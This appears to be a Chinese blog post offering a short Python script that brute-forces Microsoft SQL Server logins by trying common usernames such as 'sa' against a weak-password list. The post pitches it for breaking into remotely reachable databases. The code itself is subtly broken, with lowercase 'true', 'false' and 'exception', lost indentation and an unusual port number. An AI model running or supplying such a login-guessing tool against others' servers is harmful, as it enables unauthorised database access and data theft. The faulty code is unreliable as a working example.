Python版Mssql爆破小脚本
程序员文章站
2022-06-24 20:03:40
mssql python版本爆破小脚本,需要安装 mssql-python.exe 可以看出代码量很少,用法:保存代码为mssqldatabaseblasting.py,c...
mssql python版本爆破小脚本,需要安装 mssql-python.exe 可以看出代码量很少,用法:保存代码为mssqldatabaseblasting.py,cmd切换到 mssqldatabaseblasting.py路径下,并 执行 mssqldatabaseblasting.py即可开始破解
import pymssql
common_weak_password = ('','123456','test','root','admin','user')#密码字典
mssql_username = ('sa', 'test', 'admin', 'mssql')#账号字典
success = false
host = "127.0.0.1"#数据库ip地址
port = 1443
for username in mssql_username:
for password in common_weak_password:
try:
db = pymssql.connect(server=host, port=port, user=username, password=password)
success = true
if success:
print username, password
except exception, e:
pass
说明:看到很多网络安全爱好者,在进行渗透测试的时候,遇到数据库可以远程管理,但是无法破解其账号密码,所以此篇文章就推送几个脚本进行渗透。
上一篇: SqlServer中如何解决session阻塞问题
下一篇: SQL数据分页查询的方法